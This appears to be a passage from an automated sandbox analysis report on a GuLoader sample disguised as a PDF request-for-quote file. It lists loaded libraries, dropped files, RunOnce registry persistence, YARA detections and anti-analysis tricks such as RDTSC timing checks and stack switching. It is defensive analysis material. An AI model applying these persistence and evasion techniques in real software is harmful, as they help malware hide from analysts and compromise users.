        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Dandyens138.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: Process Memory Space: RFQ_SRC02252017-pdf.scr.exe PID: 7308, type: MEMORYSTR
        Source: Yara matchFile source: 00000008.00000002.2846924504.0000000005E9B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2172873963.0000000005E9B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_10002D40 push eax; ret 0_2_10002D6E
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile created: C:\Users\user\AppData\Local\Temp\nsp52FE.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeJump to dropped file
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernesJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernesJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\TrklosetJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\meike.PriJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Casablanca.txtJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Dandyens138.iniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\RaahusenesJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\convenes.iniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\guslee.ltaJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\havearkitekts.jpgJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\inkasseringens.iniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\konfronter.jpgJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\minirobot.uniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\straksafskrivningerne.sakJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\unthrift.jpgJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\RhinskvinsglassetsJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BefolkningsgruppeJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BefolkningsgruppeJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BefolkningsgruppeJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BefolkningsgruppeJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeAPI/Special instruction interceptor: Address: 5EA7F49
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeAPI/Special instruction interceptor: Address: 22C7F49
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeAPI/Special instruction interceptor: Address: 5EA7F49
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeAPI/Special instruction interceptor: Address: 22C7F49
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeRDTSC instruction interceptor: First address: 5E51EE9 second address: 5E51EE9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 cmp esi, 27BA7437h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F646C5233ADh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test si, 78A6h 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeRDTSC instruction interceptor: First address: 2271EE9 second address: 2271EE9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 cmp esi, 27BA7437h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F646CC2BB2Dh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test si, 78A6h 0x00000015 rdtsc
